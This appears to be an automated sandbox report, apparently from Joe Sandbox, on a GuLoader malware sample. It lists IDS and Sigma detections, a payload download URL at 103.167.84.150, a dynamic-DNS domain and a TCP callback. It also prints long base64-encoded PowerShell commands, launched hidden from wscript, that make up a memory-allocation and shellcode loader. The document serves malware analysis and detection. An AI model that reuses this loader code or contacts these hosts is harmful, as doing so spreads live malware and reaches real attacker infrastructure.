GwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATgBUAEkAUAAgAEMAaABpAHQAaQBuAG8ANgAgAGkAbgBjA

Sigma detected: T1086 PowerShell Execution

Show sources

Source: Pipe created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132823131356829074.6584.DefaultAppDomain.powershell

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000014.00000000.16108270980.0000000003000000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://103.167.84.150/mconta/Host_DwUbTLydN243.bin"}

Source:	Binary string: $pm/C:\Users\user\AppData\Local\Temp\mla4kvb3.pdb source: powershell.exe, 00000003.00000002.15262680896.0000000004F79000.00000004.00000001.sdmp
Source:	Binary string: $pm/C:\Users\user\AppData\Local\Temp\vybs2gqu.pdb source: powershell.exe, 0000000E.00000002.16353125853.0000000005015000.00000004.00000001.sdmp
Source:	Binary string: $pm/C:\Users\user\AppData\Local\Temp\uotckr0j.pdb source: powershell.exe, 0000000D.00000002.16211068158.0000000004F11000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16210155377.0000000004E74000.00000004.00000001.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49805 -> 103.167.84.150:80
Source: Traffic	Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49808 -> 103.167.84.150:80
Source: Traffic	Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49810 -> 103.167.84.150:80

Potential malicious VBS script found (has network functionality)

Show sources

Source:

Initial file: BinaryStream.SaveToFile FileName, adSaveCreateOverWrite

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://103.167.84.150/mconta/Host_DwUbTLydN243.bin

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: septnet.duckdns.org

Source: Joe Sandbox View	ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
Source: Joe Sandbox View	ASN Name: TELIANETTeliaCarrierEU TELIANETTeliaCarrierEU

Source: global traffic	HTTP traffic detected: GET /mconta/Host_DwUbTLydN243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.167.84.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mconta/Host_DwUbTLydN243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.167.84.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mconta/Host_DwUbTLydN243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.167.84.150Cache-Control: no-cache

Source: global traffic

TCP traffic: 192.168.11.20:49806 -> 193.104.197.85:6577

Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150
Source: unknown	TCP traffic detected without corresponding DNS query: 103.167.84.150

Source: ieinstal.exe, 00000013.00000002.16196308559.0000000002ED0000.00000004.00000020.sdmp, ieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmp	String found in binary or memory: http://103.167.84.150/
Source: ieinstal.exe, 00000007.00000002.16981282399.0000000003320000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16197752845.0000000003110000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339742625.0000000004CF0000.00000004.00000001.sdmp	String found in binary or memory: http://103.167.84.150/bconta/Host_DwUbTLydN243.bin
Source: ieinstal.exe, 00000013.00000002.16196308559.0000000002ED0000.00000004.00000020.sdmp, ieinstal.exe, 00000013.00000002.16197752845.0000000003110000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16196062237.0000000002EB9000.00000004.00000020.sdmp, ieinstal.exe, 00000014.00000002.16336303615.00000000032CA000.00000004.00000020.sdmp, ieinstal.exe, 00000014.00000002.16339742625.0000000004CF0000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16335676506.0000000003298000.00000004.00000020.sdmp, ieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmp	String found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.bin
Source: ieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmp	String found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.bin)
Source: ieinstal.exe, 00000014.00000002.16336303615.00000000032CA000.00000004.00000020.sdmp	String found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.bin-
Source: ieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmp	String found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.binE
Source: ieinstal.exe, 00000007.00000002.16980426643.0000000003159000.00000004.00000020.sdmp	String found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.binO
Source: ieinstal.exe, 00000013.00000002.16195282460.0000000002E88000.00000004.00000020.sdmp	String found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.binU.s
Source: ieinstal.exe, 00000013.00000002.16195282460.0000000002E88000.00000004.00000020.sdmp	String found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.bina8;
Source: ieinstal.exe, 00000013.00000002.16196308559.0000000002ED0000.00000004.00000020.sdmp	String found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.bind
Source: ieinstal.exe, 00000007.00000002.16981282399.0000000003320000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16197752845.0000000003110000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339742625.0000000004CF0000.00000004.00000001.sdmp	String found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.binhttp://103.167.84.150/bconta/Host_DwUbTLydN243.bin
Source: ieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmp	String found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.bins
Source: powershell.exe, 0000000E.00000002.16332582350.0000000000C38000.00000004.00000001.sdmp	String found in binary or memory: http://crl.micr
Source: powershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.15262680896.0000000004F79000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.15261074930.0000000004E21000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.16412756099.0000000004D31000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16202623594.0000000004A81000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16345107555.0000000004C21000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.15262680896.0000000004F79000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.15261074930.0000000004E21000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.16412756099.0000000004D31000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16202623594.0000000004A81000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16345107555.0000000004C21000.00000004.00000001.sdmp	String found in binary or memory: https://aka.ms/pscore6lBpm
Source: powershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.15262680896.0000000004F79000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown

DNS traffic detected: queries for: septnet.duckdns.org

Source: global traffic	HTTP traffic detected: GET /mconta/Host_DwUbTLydN243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.167.84.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mconta/Host_DwUbTLydN243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.167.84.150Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mconta/Host_DwUbTLydN243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.167.84.150Cache-Control: no-cache

System Summary:

Wscript starts Powershell (via cmd or directly)

Show sources

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAGUAaABlAHIAcwAgAEEATg
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -encodedcommand IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAG
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGs